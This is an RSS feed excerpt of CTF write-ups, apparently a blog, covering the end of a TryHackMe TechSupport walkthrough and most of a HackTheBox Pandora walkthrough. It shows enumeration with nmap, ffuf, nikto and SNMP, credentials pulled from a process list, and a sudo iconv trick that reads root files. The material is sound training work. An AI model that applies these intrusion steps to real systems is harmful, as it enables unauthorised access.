&lt;span class="nb"&gt;define&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt; &lt;span class="s1"&gt;'DB_COLLATE'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;''&lt;/span&gt; &lt;span class="p"&gt;);&lt;/span&gt;


&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Trying to do an SSH login to the &lt;code&gt;scamsite&lt;/code&gt; user(which we found in the home folder) using the above password?&lt;/p&gt;

&lt;p&gt;Success!! We now have a proper login shell.&lt;/p&gt;

&lt;p&gt;Let's try for privesc&lt;/p&gt;

&lt;h1&gt;
  
  
  Privesc
&lt;/h1&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;scamsite@TechSupport:~&lt;span class="nv"&gt;$ &lt;/span&gt;&lt;span class="nb"&gt;sudo&lt;/span&gt; &lt;span class="nt"&gt;-l&lt;/span&gt;
Matching Defaults entries &lt;span class="k"&gt;for &lt;/span&gt;scamsite on TechSupport:
    env_reset, mail_badpass, &lt;span class="nv"&gt;secure_path&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;/usr/local/sbin&lt;span class="se"&gt;\:&lt;/span&gt;/usr/local/bin&lt;span class="se"&gt;\:&lt;/span&gt;/usr/sbin&lt;span class="se"&gt;\:&lt;/span&gt;/usr/bin&lt;span class="se"&gt;\:&lt;/span&gt;/sbin&lt;span class="se"&gt;\:&lt;/span&gt;/bin&lt;span class="se"&gt;\:&lt;/span&gt;/snap/bin

User scamsite may run the following commands on TechSupport:
    &lt;span class="o"&gt;(&lt;/span&gt;ALL&lt;span class="o"&gt;)&lt;/span&gt; NOPASSWD: /usr/bin/iconv
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Looks like we have &lt;code&gt;sudo&lt;/code&gt; permissions for one command. Let's see if we can leverage that for privesc.&lt;/p&gt;

&lt;p&gt;Yes we can =&amp;gt; &lt;a href="https://gtfobins.github.io/gtfobins/iconv/#sudo" rel="noopener noreferrer"&gt;https://gtfobins.github.io/gtfobins/iconv/#sudo&lt;/a&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;scamsite@TechSupport:~&lt;span class="nv"&gt;$ &lt;/span&gt;&lt;span class="nb"&gt;sudo&lt;/span&gt; /usr/bin/iconv 8859_1 &lt;span class="nt"&gt;-t&lt;/span&gt; 8859_1 /root/root.txt
/usr/bin/iconv: cannot open input file &lt;span class="sb"&gt;`&lt;/span&gt;8859_1&lt;span class="s1"&gt;': No such file or directory
CENSORED  -

&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;DONE!!&lt;/p&gt;

&lt;p&gt;Also follow me on &lt;a rel="me noopener noreferrer" href="https://infosec.exchange/@kkaosninja"&gt;Mastodon&lt;/a&gt;. &lt;/p&gt;

</description>
      <category>beginners</category>
      <category>security</category>
      <category>tryhackme</category>
      <category>ctf</category>
    </item>
    <item>
      <title>HackTheBox Pandora Walkthrough</title>
      <dc:creator>Krishna</dc:creator>
      <pubDate>Fri, 27 May 2022 13:42:19 +0000</pubDate>
      <link>https://dev.to/wandering-geek/hackthebox-pandora-walkthrough-4306</link>
      <guid>https://dev.to/wandering-geek/hackthebox-pandora-walkthrough-4306</guid>
      <description>&lt;p&gt;Link to Box =&amp;gt; &lt;a href="https://app.hackthebox.com/machines/Pandora/"&gt;https://app.hackthebox.com/machines/Pandora/&lt;/a&gt;&lt;/p&gt;

&lt;h1&gt;
  
  
  Enumeration
&lt;/h1&gt;

&lt;h2&gt;
  
  
  nmap initial scan
&lt;/h2&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 &lt;span class="o"&gt;(&lt;/span&gt;Ubuntu Linux&lt;span class="p"&gt;;&lt;/span&gt; protocol 2.0&lt;span class="o"&gt;)&lt;/span&gt;
| ssh-hostkey: 
|   3072 24:c2:95:a5:c3:0b:3f:f3:17:3c:68:d7:af:2b:53:38 &lt;span class="o"&gt;(&lt;/span&gt;RSA&lt;span class="o"&gt;)&lt;/span&gt;
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDPIYGoHvNFwTTboYexVGcZzbSLJQsxKopZqrHVTeF8oEIu0iqn7E5czwVkxRO/icqaDqM+AB3QQVcZSDaz//XoXsT/NzNIbb9SERrcK/n8n9or4IbXBEtXhRvltS8NABsOTuhiNo/2fdPYCVJ/HyF5YmbmtqUPols6F5y/MK2Yl3eLMOdQQeax4AWSKVAsR+issSZlN2rADIvpboV7YMoo3ktlHKz4hXlX6FWtfDN/ZyokDNNpgBbr7N8zJ87+QfmNuuGgmcZzxhnzJOzihBHIvdIM4oMm4IetfquYm1WKG3s5q70jMFrjp4wCyEVbxY+DcJ54xjqbaNHhVwiSWUZnAyWe4gQGziPdZH2ULY+n3iTze+8E4a6rxN3l38d1r4THoru88G56QESiy/jQ8m5+Ang77rSEaT3Fnr6rnAF5VG1+kiA36rMIwLabnxQbAWnApRX9CHBpMdBj7v8oLhCRn7ZEoPDcD1P2AASdaDJjRMuR52YPDlUSDd8TnI/DFFs&lt;span class="o"&gt;=&lt;/span&gt;
|   256 b1:41:77:99:46:9a:6c:5d:d2:98:2f:c0:32:9a:ce:03 &lt;span class="o"&gt;(&lt;/span&gt;ECDSA&lt;span class="o"&gt;)&lt;/span&gt;
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNNJGh4HcK3rlrsvCbu0kASt7NLMvAUwB51UnianAKyr9H0UBYZnOkVZhIjDea3F/CxfOQeqLpanqso/EqXcT9w&lt;span class="o"&gt;=&lt;/span&gt;
|   256 e7:36:43:3b:a9:47:8a:19:01:58:b2:bc:89:f6:51:08 &lt;span class="o"&gt;(&lt;/span&gt;ED25519&lt;span class="o"&gt;)&lt;/span&gt;
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOCMYY9DMj/I+Rfosf+yMuevI7VFIeeQfZSxq67EGxsb
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.41 &lt;span class="o"&gt;((&lt;/span&gt;Ubuntu&lt;span class="o"&gt;))&lt;/span&gt;
|_http-title: Play | Landing
|_http-server-header: Apache/2.4.41 &lt;span class="o"&gt;(&lt;/span&gt;Ubuntu&lt;span class="o"&gt;)&lt;/span&gt;
|_http-favicon: Unknown favicon MD5: 115E49F9A03BB97DEB840A3FE185434C
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
Service Info: OS: Linux&lt;span class="p"&gt;;&lt;/span&gt; CPE: cpe:/o:linux:linux_kernel
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Web Server Enum
&lt;/h2&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;└─$ ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -u http://pandora.htb/FUZZ -o ffuf/ffufRaft -of html -ic -r -recursion -recursion-depth 4 -c -e .txt,.html,.bak,.gz,.zip,.php,.db,.sql,.tar.gz -sf

assets                  [Status: 200, Size: 1690, Words: 112, Lines: 21]
index.html              [Status: 200, Size: 33560, Words: 13127, Lines: 908]
server-status           [Status: 403, Size: 276, Words: 20, Lines: 10]
.html                   [Status: 403, Size: 276, Words: 20, Lines: 10]
.php                    [Status: 403, Size: 276, Words: 20, Lines: 10]
                        [Status: 200, Size: 33560, Words: 13127, Lines: 908]
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Tried some other wordlists as well. Nothing useful came up.&lt;/p&gt;

&lt;h3&gt;
  
  
  ffuf subdomain test
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;ffuf &lt;span class="nt"&gt;-u&lt;/span&gt; http://pandora.htb &lt;span class="nt"&gt;-H&lt;/span&gt; &lt;span class="s2"&gt;"Host: FUZZ.pandora.htb"&lt;/span&gt; &lt;span class="nt"&gt;-w&lt;/span&gt; /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt &lt;span class="nt"&gt;-c&lt;/span&gt; &lt;span class="nt"&gt;-o&lt;/span&gt; ffuf/subdomain &lt;span class="nt"&gt;-of&lt;/span&gt; html &lt;span class="nt"&gt;-fs&lt;/span&gt; 33560

EMPTY
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  nikto -h
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;nikto &lt;span class="nt"&gt;-h&lt;/span&gt; http://panda.htb/
+ Server: Apache/2.4.41 &lt;span class="o"&gt;(&lt;/span&gt;Ubuntu&lt;span class="o"&gt;)&lt;/span&gt;
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site &lt;span class="k"&gt;in &lt;/span&gt;a different fashion to the MIME &lt;span class="nb"&gt;type&lt;/span&gt;
+ No CGI Directories found &lt;span class="o"&gt;(&lt;/span&gt;use &lt;span class="s1"&gt;'-C all'&lt;/span&gt; to force check all possible &lt;span class="nb"&gt;dirs&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;
+ Server may leak inodes via ETags, header found with file /, inode: 8318, size: 5d23e548bc656, mtime: &lt;span class="nb"&gt;gzip&lt;/span&gt;
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD
+ /: A Wordpress installation was found.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  observations
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;Web Dir listing seems to be enabled. Check &lt;a href="http://pandora.htb/assets/"&gt;http://pandora.htb/assets/&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;Prescence of &lt;a href="http://pandora.htb/assets/images/blog/"&gt;http://pandora.htb/assets/images/blog/&lt;/a&gt; suggests there is a blog somewhere. We have to find it. Perhaps a login is available?&lt;/li&gt;
&lt;li&gt;nikto output also has a weird line. Not really sure what that means though&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  nmap UDP scan
&lt;/h3&gt;

&lt;p&gt;Scanning UDP as a last resort, since the website is a dead end.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;sudo &lt;/span&gt;nmap &lt;span class="nt"&gt;-sUV&lt;/span&gt; panda.htb &lt;span class="nt"&gt;-oN&lt;/span&gt; nmap/udpFirst &lt;span class="nt"&gt;-vv&lt;/span&gt;

PORT    STATE SERVICE REASON              VERSION
161/udp open  snmp    udp-response ttl 63 SNMPv1 server&lt;span class="p"&gt;;&lt;/span&gt; net-snmp SNMPv3 server &lt;span class="o"&gt;(&lt;/span&gt;public&lt;span class="o"&gt;)&lt;/span&gt;
Service Info: Host: pandora
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;So we have found an SNMP port. This is possibly a foothold vector. Let's try getting some info.&lt;/p&gt;

&lt;p&gt;Using this as a guide =&amp;gt; &lt;a href="https://medium.com/@minimalist.ascent/enumerating-snmp-servers-with-nmap-89aaf33bce28"&gt;https://medium.com/@minimalist.ascent/enumerating-snmp-servers-with-nmap-89aaf33bce28&lt;/a&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;└─&lt;span class="nv"&gt;$ &lt;/span&gt;&lt;span class="nb"&gt;sudo &lt;/span&gt;nmap &lt;span class="nt"&gt;-sUV&lt;/span&gt; &lt;span class="nt"&gt;-p&lt;/span&gt; 161 &lt;span class="nt"&gt;--script&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;snmp-info pandora.htb
&lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="nb"&gt;sudo&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; password &lt;span class="k"&gt;for &lt;/span&gt;kali: 
Starting Nmap 7.92 &lt;span class="o"&gt;(&lt;/span&gt; https://nmap.org &lt;span class="o"&gt;)&lt;/span&gt; at 2022-01-14 02:42 EST
Nmap scan report &lt;span class="k"&gt;for &lt;/span&gt;pandora.htb &lt;span class="o"&gt;(&lt;/span&gt;10.10.11.136&lt;span class="o"&gt;)&lt;/span&gt;
Host is up &lt;span class="o"&gt;(&lt;/span&gt;0.047s latency&lt;span class="o"&gt;)&lt;/span&gt;&lt;span class="nb"&gt;.&lt;/span&gt;

PORT    STATE SERVICE VERSION
161/udp open  snmp    SNMPv1 server&lt;span class="p"&gt;;&lt;/span&gt; net-snmp SNMPv3 server &lt;span class="o"&gt;(&lt;/span&gt;public&lt;span class="o"&gt;)&lt;/span&gt;
| snmp-info: 
|   enterprise: net-snmp
|   engineIDFormat: unknown
|   engineIDData: 48fa95537765c36000000000
|   snmpEngineBoots: 30
|_  snmpEngineTime: 25m05s
Service Info: Host: pandora

└─&lt;span class="nv"&gt;$ &lt;/span&gt;&lt;span class="nb"&gt;sudo &lt;/span&gt;nmap &lt;span class="nt"&gt;-sUV&lt;/span&gt; &lt;span class="nt"&gt;-p&lt;/span&gt; 161 &lt;span class="nt"&gt;--script&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;snmp-interfaces pandora.htb
Starting Nmap 7.92 &lt;span class="o"&gt;(&lt;/span&gt; https://nmap.org &lt;span class="o"&gt;)&lt;/span&gt; at 2022-01-14 02:43 EST
Nmap scan report &lt;span class="k"&gt;for &lt;/span&gt;pandora.htb &lt;span class="o"&gt;(&lt;/span&gt;10.10.11.136&lt;span class="o"&gt;)&lt;/span&gt;
Host is up &lt;span class="o"&gt;(&lt;/span&gt;0.046s latency&lt;span class="o"&gt;)&lt;/span&gt;&lt;span class="nb"&gt;.&lt;/span&gt;

PORT    STATE SERVICE VERSION
161/udp open  snmp    SNMPv1 server&lt;span class="p"&gt;;&lt;/span&gt; net-snmp SNMPv3 server &lt;span class="o"&gt;(&lt;/span&gt;public&lt;span class="o"&gt;)&lt;/span&gt;
| snmp-interfaces: 
|   lo
|     IP address: 127.0.0.1  Netmask: 255.0.0.0
|     Type: softwareLoopback  Speed: 10 Mbps
|     Status: up
|     Traffic stats: 142.54 Kb sent, 142.54 Kb received
|   VMware VMXNET3 Ethernet Controller
|     IP address: 10.10.11.136  Netmask: 255.255.254.0
|     MAC address: 00:50:56:b9:3f:d3 &lt;span class="o"&gt;(&lt;/span&gt;VMware&lt;span class="o"&gt;)&lt;/span&gt;
|     Type: ethernetCsmacd  Speed: 4 Gbps
|     Status: up
|_    Traffic stats: 146.13 Kb sent, 165.78 Kb received
Service Info: Host: pandora


└─&lt;span class="nv"&gt;$ &lt;/span&gt;&lt;span class="nb"&gt;sudo &lt;/span&gt;nmap &lt;span class="nt"&gt;-sUV&lt;/span&gt; &lt;span class="nt"&gt;-p&lt;/span&gt; 161 &lt;span class="nt"&gt;--script&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;snmp-netstat pandora.htb
Starting Nmap 7.92 &lt;span class="o"&gt;(&lt;/span&gt; https://nmap.org &lt;span class="o"&gt;)&lt;/span&gt; at 2022-01-14 02:44 EST
Nmap scan report &lt;span class="k"&gt;for &lt;/span&gt;pandora.htb &lt;span class="o"&gt;(&lt;/span&gt;10.10.11.136&lt;span class="o"&gt;)&lt;/span&gt;
Host is up &lt;span class="o"&gt;(&lt;/span&gt;0.045s latency&lt;span class="o"&gt;)&lt;/span&gt;&lt;span class="nb"&gt;.&lt;/span&gt;

PORT    STATE SERVICE VERSION
161/udp open  snmp    SNMPv1 server&lt;span class="p"&gt;;&lt;/span&gt; net-snmp SNMPv3 server &lt;span class="o"&gt;(&lt;/span&gt;public&lt;span class="o"&gt;)&lt;/span&gt;
| snmp-netstat: 
|   TCP  0.0.0.0:22           0.0.0.0:0
|   TCP  10.10.11.136:54460   1.1.1.1:53
|   TCP  127.0.0.1:3306       0.0.0.0:0
|   TCP  127.0.0.53:53        0.0.0.0:0
|   UDP  0.0.0.0:161          &lt;span class="k"&gt;*&lt;/span&gt;:&lt;span class="k"&gt;*&lt;/span&gt;
|_  UDP  127.0.0.53:53        &lt;span class="k"&gt;*&lt;/span&gt;:&lt;span class="k"&gt;*&lt;/span&gt;
Service Info: Host: pandora


└─&lt;span class="nv"&gt;$ &lt;/span&gt;&lt;span class="nb"&gt;sudo &lt;/span&gt;nmap &lt;span class="nt"&gt;-sUV&lt;/span&gt; &lt;span class="nt"&gt;-p&lt;/span&gt; 161 &lt;span class="nt"&gt;--script&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;snmp-sysdescr pandora.htb
Starting Nmap 7.92 &lt;span class="o"&gt;(&lt;/span&gt; https://nmap.org &lt;span class="o"&gt;)&lt;/span&gt; at 2022-01-14 02:46 EST
Nmap scan report &lt;span class="k"&gt;for &lt;/span&gt;pandora.htb &lt;span class="o"&gt;(&lt;/span&gt;10.10.11.136&lt;span class="o"&gt;)&lt;/span&gt;
Host is up &lt;span class="o"&gt;(&lt;/span&gt;0.046s latency&lt;span class="o"&gt;)&lt;/span&gt;&lt;span class="nb"&gt;.&lt;/span&gt;

PORT    STATE SERVICE VERSION
161/udp open  snmp    SNMPv1 server&lt;span class="p"&gt;;&lt;/span&gt; net-snmp SNMPv3 server &lt;span class="o"&gt;(&lt;/span&gt;public&lt;span class="o"&gt;)&lt;/span&gt;
| snmp-sysdescr: Linux pandora 5.4.0-91-generic &lt;span class="c"&gt;#102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64&lt;/span&gt;
|_  System &lt;span class="nb"&gt;uptime&lt;/span&gt;: 29m2.87s &lt;span class="o"&gt;(&lt;/span&gt;174287 timeticks&lt;span class="o"&gt;)&lt;/span&gt;


Starting Nmap 7.92 &lt;span class="o"&gt;(&lt;/span&gt; https://nmap.org &lt;span class="o"&gt;)&lt;/span&gt; at 2022-01-14 02:47 EST
Nmap scan report &lt;span class="k"&gt;for &lt;/span&gt;pandora.htb &lt;span class="o"&gt;(&lt;/span&gt;10.10.11.136&lt;span class="o"&gt;)&lt;/span&gt;
Host is up &lt;span class="o"&gt;(&lt;/span&gt;0.045s latency&lt;span class="o"&gt;)&lt;/span&gt;&lt;span class="nb"&gt;.&lt;/span&gt;

PORT    STATE SERVICE VERSION
161/udp open  snmp    SNMPv1 server&lt;span class="p"&gt;;&lt;/span&gt; net-snmp SNMPv3 server &lt;span class="o"&gt;(&lt;/span&gt;public&lt;span class="o"&gt;)&lt;/span&gt;
| snmp-processes:
|   849: 
|     Name: sh
|     Path: /bin/sh
|     Params: &lt;span class="nt"&gt;-c&lt;/span&gt; &lt;span class="nb"&gt;sleep &lt;/span&gt;30&lt;span class="p"&gt;;&lt;/span&gt; /bin/bash &lt;span class="nt"&gt;-c&lt;/span&gt; &lt;span class="s1"&gt;'/usr/bin/host_check -u daniel -p CENSORED'&lt;/span&gt;
|   863: 
|     Name: snmpd
|     Path: /usr/sbin/snmpd
|     Params: &lt;span class="nt"&gt;-LOw&lt;/span&gt; &lt;span class="nt"&gt;-u&lt;/span&gt; Debian-snmp &lt;span class="nt"&gt;-g&lt;/span&gt; Debian-snmp &lt;span class="nt"&gt;-I&lt;/span&gt; &lt;span class="nt"&gt;-smux&lt;/span&gt; mteTrigger mteTriggerConf &lt;span class="nt"&gt;-f&lt;/span&gt; &lt;span class="nt"&gt;-p&lt;/span&gt; /run/snmpd.pid
|   1103: 
|     Name: host_check
|     Path: /usr/bin/host_check
|     Params: &lt;span class="nt"&gt;-u&lt;/span&gt; daniel &lt;span class="nt"&gt;-p&lt;/span&gt; CENSORED
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;We may have inadvertently found some credentials. Trying the combo &lt;code&gt;daniel:CENSORED&lt;/code&gt; on the SSH port&lt;/p&gt;

&lt;p&gt;SUCCESS!! This was way easier than expected&lt;/p&gt;

&lt;h1&gt;
  
  
  Foothold
&lt;/h1&gt;

&lt;p&gt;User flag is not present in the home directory. Trying to search for it.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;daniel@pandora:~&lt;span class="nv"&gt;$ &lt;/span&gt;find / &lt;span class="nt"&gt;-type&lt;/span&gt; f &lt;span class="nt"&gt;-name&lt;/span&gt; user.txt 2&amp;gt;/dev/null 
/home/matt/user.txt

daniel@pandora:/home/matt&lt;span class="nv"&gt;$ &lt;/span&gt;&lt;span class="nb"&gt;ls&lt;/span&gt; &lt;span class="nt"&gt;-la&lt;/span&gt;
total 24
drwxr-xr-x 2 matt matt 4096 Dec  7 15:00 &lt;span class="nb"&gt;.&lt;/span&gt;
drwxr-xr-x 4 root root 4096 Dec  7 14:32 ..
lrwxrwxrwx 1 matt matt    9 Jun 11  2021 .bash_history -&amp;gt; /dev/null
&lt;span class="nt"&gt;-rw-r--r--&lt;/span&gt; 1 matt matt  220 Feb 25  2020 .bash_logout
&lt;span class="nt"&gt;-rw-r--r--&lt;/span&gt; 1 matt matt 3771 Feb 25  2020 .bashrc
&lt;span class="nt"&gt;-rw-r--r--&lt;/span&gt; 1 matt matt  807 Feb 25  2020 .profile
&lt;span class="nt"&gt;-rw-r-----&lt;/span&gt; 1 root matt   33 Jan 14 07:17 user.txt
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;We will have to find a way to pivot to the &lt;code&gt;matt&lt;/code&gt; user if we are to get the user flag. &lt;/p&gt;

&lt;h1&gt;
  
  
  Privesc
&lt;/h1&gt;

&lt;p&gt;While looking for SUID binaries, found this&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;daniel@pandora:/home/matt&lt;span class="nv"&gt;$ &lt;/span&gt;&lt;span class="nb"&gt;ls&lt;/span&gt; &lt;span class="nt"&gt;-lh&lt;/span&gt; /usr/bin/pandora_backup
&lt;span class="nt"&gt;-rwsr-x---&lt;/span&gt; 1 root matt 17K Dec  3 15:58 /usr/bin/pandora_backup
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Cant really do much with it tho. As we are not the &lt;code&gt;matt&lt;/code&gt; user.&lt;/p&gt;

&lt;p&gt;Anyway running &lt;code&gt;linpeas.sh&lt;/code&gt; now. We are running under &lt;code&gt;daniel&lt;/code&gt;, so we dont have a lot of privileges.&lt;/p&gt;

&lt;h2&gt;
  
  
  linpeas run
&lt;/h2&gt;

&lt;p&gt;Interesting Stuff only.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;╔══════════╣ CVEs Check
Vulnerable to CVE-2021-4034

╔══════════╣ Protections
═╣ Is ASLR enabled? ............... Yes                                                                                                                      
═╣ Is this a virtual machine? ..... Yes &lt;span class="o"&gt;(&lt;/span&gt;vmware&lt;span class="o"&gt;)&lt;/span&gt;            

══════════╣ Cleaned processes                                                                                                                               
╚ Check weird &amp;amp; unexpected proceses run by root: https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes
systemd+     528  0.0  0.1  18408  7456 ?        Ss   16:13   0:00 /lib/systemd/systemd-networkd
  └─&lt;span class="o"&gt;(&lt;/span&gt;Caps&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="nv"&gt;0x0000000000003c00&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw
root         779  0.0  0.0   6812  2772 ?        Ss   16:13   0:00 /usr/sbin/cron &lt;span class="nt"&gt;-f&lt;/span&gt;
root         797  0.0  0.0   8352  3396 ?        S    16:13   0:00  _ /usr/sbin/CRON &lt;span class="nt"&gt;-f&lt;/span&gt;
root         810  0.0  0.0   2608   548 ?        Ss   16:13   0:00      _ /bin/sh &lt;span class="nt"&gt;-c&lt;/span&gt; &lt;span class="nb"&gt;sleep &lt;/span&gt;30&lt;span class="p"&gt;;&lt;/span&gt; /bin/bash &lt;span class="nt"&gt;-c&lt;/span&gt; &lt;span class="s1"&gt;'/usr/bin/host_check -u daniel -p CENSORED'&lt;/span&gt;
root        1119  0.0  0.0   2488  1428 ?        S    16:13   0:00          _ /usr/bin/host_check &lt;span class="nt"&gt;-u&lt;/span&gt; daniel &lt;span class="nt"&gt;-p&lt;/span&gt; CENSORED

&lt;span class="c"&gt;# What in the world? cap_setuid ??&lt;/span&gt;
root         838  0.0  0.7 228068 31468 ?        Ss   16:13   0:01 /usr/sbin/apache2 &lt;span class="nt"&gt;-k&lt;/span&gt; start
www-data    1050  0.0  0.3 228500 13756 ?        S    16:13   0:00  _ /usr/sbin/apache2 &lt;span class="nt"&gt;-k&lt;/span&gt; start
  └─&lt;span class="o"&gt;(&lt;/span&gt;Caps&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="nv"&gt;0x00000000008000c4&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;cap_dac_read_search,cap_setgid,cap_setuid,cap_sys_nice
www-data    1051  0.0  0.3 228500 13756 ?        S    16:13   0:00  _ /usr/sbin/apache2 &lt;span class="nt"&gt;-k&lt;/span&gt; start
  └─&lt;span class="o"&gt;(&lt;/span&gt;Caps&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="nv"&gt;0x00000000008000c4&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;cap_dac_read_search,cap_setgid,cap_setuid,cap_sys_nice
www-data    1052  0.0  0.3 228500 13756 ?        S    16:13   0:00  _ /usr/sbin/apache2 &lt;span class="nt"&gt;-k&lt;/span&gt; start
  └─&lt;span class="o"&gt;(&lt;/span&gt;Caps&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="nv"&gt;0x00000000008000c4&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;cap_dac_read_search,cap_setgid,cap_setuid,cap_sys_nice
www-data    1053  0.0  0.3 228500 13756 ?        S    16:13   0:00  _ /usr/sbin/apache2 &lt;span class="nt"&gt;-k&lt;/span&gt; start
  └─&lt;span class="o"&gt;(&lt;/span&gt;Caps&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="nv"&gt;0x00000000008000c4&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;cap_dac_read_search,cap_setgid,cap_setuid,cap_sys_nice
www-data    1054  0.0  0.3 228500 13756 ?        S    16:13   0:00  _ /usr/sbin/apache2 &lt;span class="nt"&gt;-k&lt;/span&gt; start
  └─&lt;span class="o"&gt;(&lt;/span&gt;Caps&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="nv"&gt;0x00000000008000c4&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;cap_dac_read_search,cap_setgid,cap_setuid,cap_sys_nice
www-data    1123  0.0  0.3 228500 13756 ?        S    16:13   0:00  _ /usr/sbin/apache2 &lt;span class="nt"&gt;-k&lt;/span&gt; start
  └─&lt;span class="o"&gt;(&lt;/span&gt;Caps&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="nv"&gt;0x00000000008000c4&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;cap_dac_read_search,cap_setgid,cap_setuid,cap_sys_nice

╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports                                                                                
tcp        0      0 127.0.0.1:3306          0.0.0.0:&lt;span class="k"&gt;*&lt;/span&gt;               LISTEN      -                                                                            
tcp        0      0 127.0.0.53:53           0.0.0.0:&lt;span class="k"&gt;*&lt;/span&gt;               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:&lt;span class="k"&gt;*&lt;/span&gt;               LISTEN      -                   
tcp6       0      0 :::80                   :::&lt;span class="k"&gt;*&lt;/span&gt;                    LISTEN      -                   
tcp6       0      0 :::22                   :::&lt;span class="k"&gt;*&lt;/span&gt;                    LISTEN      -  

╔══════════╣ Superusers
root:x:0:0:root:/root:/bin/bash                                                                                                                              

╔══════════╣ Users with console
daniel:x:1001:1001::/home/daniel:/bin/bash                                                                                                                   
matt:x:1000:1000:matt:/home/matt:/bin/bash
root:x:0:0:root:/root:/bin/bash

╔══════════╣ Useful software
/usr/bin/base64                                                                                                                                              
/usr/bin/curl
/usr/bin/nc
/usr/bin/netcat
/usr/bin/nmap
/usr/bin/perl
/usr/bin/php
/usr/bin/ping
/usr/bin/python3
/usr/bin/socat
/usr/bin/sudo
/usr/bin/wget

╔══════════╣ MySQL
mysql  Ver 15.1 Distrib 10.3.32-MariaDB, &lt;span class="k"&gt;for &lt;/span&gt;debian-linux-gnu &lt;span class="o"&gt;(&lt;/span&gt;x86_64&lt;span class="o"&gt;)&lt;/span&gt; using readline 5.2                                                                    

═╣ MySQL connection using default root/root ........... No                                                                                                   
═╣ MySQL connection using root/toor ................... No                                                                                                   
═╣ MySQL connection using root/NOPASS ................. No 

══╣ PHP &lt;span class="nb"&gt;exec &lt;/span&gt;extensions
